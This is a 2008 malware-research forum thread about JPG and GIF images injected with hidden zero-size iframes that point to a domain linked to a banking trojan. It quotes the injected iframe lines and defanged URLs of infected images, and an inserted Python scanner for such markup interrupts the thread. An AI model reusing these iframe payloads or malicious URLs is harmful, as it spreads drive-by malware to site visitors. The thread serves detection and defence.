Malware Domain List

Malware Related => Malicious Domains => Topic started by: sowhat-x on August 03, 2008, 11:13:36 pm

Title: W32/JPGiframer
Post by: sowhat-x on August 03, 2008, 11:13:36 pm
What the heck...thought I'd finally plan my summer vacation, yet again...
seems that not even that can take place nowadays, without stumbling across newer malware attacks...
Have 'fun' looking at this:

Quote
hxxp://www.xenonaskazakou.gr/
Now check out the jpg image in the homepage... ;)
(Also added as an attachment...pass is "infected")
Detection rate...8/36 (22.23%)
http://www.virustotal.com/analisis/063dcf189bdaf5a42378ec3c5c3a82af

Quote
<iframe src=hxxp://www.goldwindos2000.com/xiaoaone/index.htm widht=0 height=0></iframe>
<iframe src=hxxp://www.goldwindos2000.com/hkeraone/hker.htm widht=0 height=0></iframe>
<iframe src=hxxp://www.goldwindos2000.com/xiaoaone/index.htm widht=0 height=0></iframe>

The injected goldwindos2000 domain has already been in the list since late January.
Google also revealed the following ThreatExpert report from that time...Trojan-Spy.Banker.CCB:
http://www.threatexpert.com/report.aspx?uid=d399f86f-b341-4e1c-9a9c-822659b7721f
As with most malware nowadays, it's all about the money...
Title: Re: W32/JPGiframer
Post by: pcaccent on August 04, 2008, 01:10:35 am
very interesting...
Title: Re: W32/JPGiframer
Post by: tjs on August 04, 2008, 07:24:57 am
Hmm, so I've been digging into this and reading JPG file format specs..

I noticed the string 'ducky' in the JFIF header and thought it might be a clue. It's not. This string is automatically added by Adobe Photoshop (so we know they used that to create the image).

I have a feeling that this might be the work of a file infector that targets files in the httpd directory... I've been unable to make this 'attack' work in a browser or email client so far... has anyone else had any luck?

TJS
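Since the thread is about HTML markup hiding inside an image, here is an added checker (not code from the thread or from any of the posters) that walks a JPEG's marker segments and reports iframe/script tags found anywhere except the compressed pixel data, including bytes appended after the EOI marker, which is where such payloads typically sit. The sample file it scans is a constructed minimal JPEG skeleton with an iframe appended, not the real attachment; the domain in it is a placeholder.

```python
import re
import struct

# HTML markup has no business inside an image file, wherever a lax parser might see it.
HTML_TAG = re.compile(rb"<\s*(iframe|script|object|embed)\b", re.IGNORECASE)


def jpeg_segments(data):
    """Yield (name, payload) for each JPEG segment; 'SCAN' is entropy-coded data,
    'TRAILER' is whatever follows the EOI marker (or a truncated file's remainder)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI: the image ends here
            yield "EOI", b""
            pos += 2
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]   # includes its own 2 bytes
        yield "0x%02X" % marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length
        if marker == 0xDA:                      # SOS: scan data runs until the next FF D9
            end = data.find(b"\xff\xd9", pos)
            end = len(data) if end == -1 else end
            yield "SCAN", data[pos:end]
            pos = end
    yield "TRAILER", data[pos:]


def find_injected_html(data):
    """Return [(segment, tag)] for HTML tags found outside the compressed pixel data."""
    hits = []
    for name, payload in jpeg_segments(data):
        if name == "SCAN":
            continue                            # pixel data is never parsed as HTML
        for m in HTML_TAG.finditer(payload):
            hits.append((name, m.group(1).decode().lower()))
    return hits


def build_sample():
    """Constructed test file: minimal JFIF header, a benign 'Ducky'-style comment,
    a stub scan, EOI, then an iframe appended after EOI (placeholder domain)."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    jpg = b"\xff\xd8\xff\xe0" + struct.pack(">H", len(app0) + 2) + app0
    com = b"Ducky"
    jpg += b"\xff\xfe" + struct.pack(">H", len(com) + 2) + com
    sos = b"\x01\x01\x00\x00\x3f\x00"
    jpg += b"\xff\xda" + struct.pack(">H", len(sos) + 2) + sos + b"\x00\x11\x22\xff\xd9"
    return jpg + b'<iframe src=http://example.invalid/x.htm width=0 height=0></iframe>'
```

Run `find_injected_html(open(path, "rb").read())` over a web root's images; anything reported in a COM/APPn segment or the TRAILER deserves a look, while the 'Ducky' string alone does not trigger, as tjs noted.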
Title: Re: W32/JPGiframer
Post by: Serg on August 04, 2008, 01:10:46 pm
"it's all about the money..."
E... but this iframe doesn't work)
Title: Re: W32/JPGiframer
Post by: sowhat-x on August 04, 2008, 02:44:07 pm
Quote
... but this iframe doesn't work
Yeap, at the current moment, at least the referenced iframe link to goldwindos2000.com appears "inactive",
but this doesn't really mean a thing, that's why I referenced the ThreatExpert report...  ;)

I believe these lamers are currently in early stages of experimenting/searching new injection techniques,
so I wouldn't really concentrate much on the domain itself...
but more on which browser/web app might be vulnerable out there...
Title: Re: W32/JPGiframer
Post by: sowhat-x on August 04, 2008, 03:01:15 pm
Heh, here we go - mystery solved (at least for the most part of it...)  :)
http://blog.scansafe.com/journal/2008/7/6/june-a-month-of-new-image-exploits.html
Plus...
http://www.viruslist.com/en/weblog?weblogid=208187540

And one more sample that I've dug up while searching around...
Quote
hxxp://www.spinoza.gr/Images/home.gif
Title: Re: W32/JPGiframer
Post by: JohnC on August 07, 2008, 05:24:57 pm
Thanks.
Title: Re: W32/JPGiframer
Post by: sowhat-x on November 15, 2008, 03:58:04 pm
Quote
hxxp://ly.wj.js.cn/Uppic/logo/2008724102151.gif
Result: 4/36 (11.12%)
http://www.virustotal.com/analisis/446dc2fe3c0aee3bc2d4888dbf284b1f